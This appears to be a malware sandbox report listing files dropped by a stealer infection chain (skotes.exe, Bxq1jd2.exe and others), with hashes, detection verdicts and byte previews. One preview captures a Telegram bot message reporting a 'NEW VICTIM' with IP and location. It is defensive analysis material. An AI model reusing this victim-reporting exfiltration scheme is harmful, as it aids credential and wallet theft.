SHA-256:	E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
SHA-512:	1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
Malicious:	false
Preview:	SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\S0RQI5

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\ProgramData\KXBASJECBA1V\S2VKXT

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08434615749937499
Encrypted:	false
SSDEEP:	192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
MD5:	93BAA1B7500F3ADB16BE27FCB2E256A8
SHA1:	77CB640557F5F7950B083405B4AEE0573D11D98F
SHA-256:	7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
SHA-512:	C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\TR9Z5X

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\Y5FK6F

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	0.44975538801868414
Encrypted:	false
SSDEEP:	96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
MD5:	89E4498D0328AFC71113CC75EBE7D770
SHA1:	120CF58C897FF1025F8B4F854A21821D948F74BC
SHA-256:	F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
SHA-512:	7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
Malicious:	false
Preview:	SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KXBASJECBA1V\YU3ECB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	321024
Entropy (8bit):	6.388427618173688
Encrypted:	false
SSDEEP:	3072:u2ShpWIPJq+l0qwJyLZhOaHgEbR23iLEhO5efjlbDdl75Zsa1bkZ:uxVl0qwIhOAgEbXUjLF
MD5:	876A365BDA09B9EF39605E375D677F0A
SHA1:	2C12B38ED2D84722CF5DCEA8BD45CFA7D7B55BA4
SHA-256:	ED252FE89BA1243BAD21F373C952B16940A0094149B0BE50E5C3DA9C20A23234
SHA-512:	2A2DF513D61E9B0EEEDF099BB6A04962CAA5EB31149EFC24421BC30236886FC4A60FB7BCABED46069F0A13789CA34D4F21BC02F3C53BD8CF428BE399AE63CB7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....e.................X....?.....\........p....@..........................pB.............................................l...P....pA.0..............................................................@............p...............................text....V.......X.................. ..`.rdata..L"...p...$...\..............@..@.data.....=......p..................@....rsrc...0....pA.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2171872
Entropy (8bit):	7.7099497618349515
Encrypted:	false
SSDEEP:	49152:RwQjzMOpKBpxGlMEFxZ6Ox4zIoCtNx6wz:7zM5EGEFxZwI5fJz
MD5:	E48D0435A98834793CE9DE1BB80FCF9A
SHA1:	F783AD89853913987852C17E950F9697AFBC4EDE
SHA-256:	BB6973B370222C70D95255622B354A328809A1116D31C69122B35508E1601831
SHA-512:	7E3018A7F2741CF8ADC3491EEA00A2C67B25831F51904A956DC63FC8EAC2BAC876D4015F5AA0AB554BF45C5A2F93ADCA0D0810AAD758E61D072C3E0B038553A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h&T...............P.................. ... ....@.. .......................`!.....V<!...@.................................P...K.... ..P............. ..'...@!...................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@!....... .............@..B........................H........{..t...........d...............................................6+.(..GX(..............(...........................(......0..........(....84.......E....2...R...8-...s.........8....s.........80...s.........8....s......... .....:....& ....8....s......... .....9....&8........0..............0..............0..............0..............0............................0..............0.....................0............."..................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1834496
Entropy (8bit):	7.947620086095118
Encrypted:	false
SSDEEP:	49152:05+SKvXhag1L9rYoMaf3nHwKUXBKTgEdjVS1:y+SKvh11VYoMafg1BSpVS1
MD5:	6C1D0DABE1EC5E928F27B3223F25C26B
SHA1:	E25AB704A6E9B3E4C30A6C1F7043598A13856AD9
SHA-256:	92228A0012605351CF08DF9A2AD4B93FA552D7A75991F81FB80F1AE854A0E57D
SHA-512:	3A3F7AF4F6018FCBD8C6F2871270504731CF269134453C9A146351C3E4A5C89165ECCCAFB3655D8B39C1FF1EC68F06E1851C0ABD66D47602E1F0F8E36D4ACFE9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................H...........@...........................H..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ubvmxkob.........z...^..............@...xdawalmh.....pH.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	303
Entropy (8bit):	4.9485431528176616
Encrypted:	false
SSDEEP:	6:5LKS39zKE0g6cJv1Vpv//fTdD3Dd5LJW1CRW35jY:934g6cJv1j/Xn3WV5k
MD5:	6F52D4DB1877B789A41E3D246FE72071
SHA1:	48ABD4ED82586E3872427C3D56926D944C2863B3
SHA-256:	BB0E62DF940826B0F7D7DF84E86192B1ABCF027153A2F65D9BF2E14419198F3A
SHA-512:	7AABB236FFB855699AE947681CFADA064AD3DA7CECDD78B8928E0DC5AB000D166327842B4598968317AFC614B0F6396F33ED80DD4B85D8345E544A7A0C858476
Malicious:	false
Preview:	{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	727552
Entropy (8bit):	7.888061454157426
Encrypted:	false
SSDEEP:	12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
MD5:	28E568616A7B792CAC1726DEB77D9039
SHA1:	39890A418FB391B823ED5084533E2E24DFF021E1
SHA-256:	9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
SHA-512:	85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......\|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870848
Entropy (8bit):	7.948256943637
Encrypted:	false
SSDEEP:	49152:yKD0uV1wnSX/yZviIF03twYZlzy3IrS7ZNL+g9is:yedVSSXoviIy3lGYyZf
MD5:	6255D0D884765ABD3BB418F367CAA8E9
SHA1:	1E1FAF3970EBE15E3D2EB1CF45CB15B56B42DB8B
SHA-256:	CF0980521BB8139A249205FCB0FC320A43B182C694DB7F8D4E3DECA0E1C65F97
SHA-512:	1B666EBE033ADA719D3E9FEC9CDC4E4BE7BFF472FCF184BCBA41AD9D39D92B65816BC3ABBE29DCA90DE96298D27CF8FAAB2866D7DA1508AC2369528FBCCBAF35
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................J...........@..........................0J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...jaliwopm....../......`..............@...chtmvbnb......I......f..............@....taggant.0....J.."...j..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	772
Entropy (8bit):	5.0849952422000335
Encrypted:	false
SSDEEP:	24:YKOHXy1JVBa4YGQVPe071kWaPyoZERkQJE7BYTlc:YVHXQTBj/Q51mPtZgu9ulc
MD5:	8E923C32EE053D16BECBB680129BADAA
SHA1:	880D6F12C8632B136FCE1B805E7B549E7CB5FCE4
SHA-256:	25923099D8BA7A517A4DF51C01582CD91D2E7347A6277D7149E8840BCA837F80
SHA-512:	938AB8B5EAED08B5E796EAD6D50B91251AC9A0C2C312B5556F512DFC81B6F41E30E12B800E9A70C65D72A68972ECCACC608F96EB98D2079FC8EC1F957C2921A8
Malicious:	false
Preview:	{"ok":true,"result":{"message_id":11786,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734218493,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 89.187.171.165\nDevice Name: 704672\nLocation: Atlanta, Georgia, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":14,"type":"url"},{"offset":63,"length":12,"type":"bold"},{"offset":83,"length":9,"type":"bold"},{"offset":114,"length":8,"type":"bold"},{"offset":123,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1752576
Entropy (8bit):	7.935020729959646
Encrypted:	false
SSDEEP:	24576:6IjcXZj0IAWtYER7kEyyZkaMpDgaXNFBO2J2c+y0sRoVMY5h0RZ6xjldcQdJkM0P:6HmWtMJyZkJ0U/429BsV7IRZ6XaQEl
MD5:	896C86DB673D2FB674920380E608677B
SHA1:	9610E0CE21E13334718FC3B947041B4AE6199FF9
SHA-256:	5D218069316FF21E6C183D0F14624D2483EF19B0FFEC2516146EA2C66EDF1423
SHA-512:	9BA67AA91B0E9D37D49FFA18680630EA3B57E4EE42487992395337E94FA71E300B3EF5AA89D59CC73D616AE963207FF0003213067FDB605C6BC617BA8AA9C4AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb.............................`E.. ... ....@.. ........................E......'....@.................................U@..i.... .......................A...................................................................................... . ..... ...t... ..............@....rsrc........ ......................@....idata . ...@......................@... ..)..`......................@...frbjvewh.....@+.....................@...odinhcyc. ...@E.....................@....taggant.@...`E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, Author: ditekSHen
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970752
Entropy (8bit):	6.703941229502815
Encrypted:	false
SSDEEP:	24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aY8Ob:CTvC/MTQYxsWR7aY
MD5:	33E2A0EC0B8839B1DBECB8FC59CEE37A
SHA1:	B9550871DE00BD87C5E8990FF32E7771BF634905
SHA-256:	8E55D8585F852454BA66BE697EFAD31F7D0ABA3A7105587608F9A5C7F51EE4A6
SHA-512:	B25596892A989D0C7ABD7CBAFEDACDE68D258EB619C40E2775AE2FEDA2133ECB977E0497F8FC1F37D032867B4D4549105A832B2CCAAD3E903DB4230B53FABDB5
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....^g..........".......... ......w.............@..........................0.......c....@...@.......@.....................d...\|....@..Le.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Le...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	393728
Entropy (8bit):	6.004737079894222
Encrypted:	false
SSDEEP:	6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
MD5:	DFD5F78A711FA92337010ECC028470B4
SHA1:	1A389091178F2BE8CE486CD860DE16263F8E902E
SHA-256:	DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
SHA-512:	A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
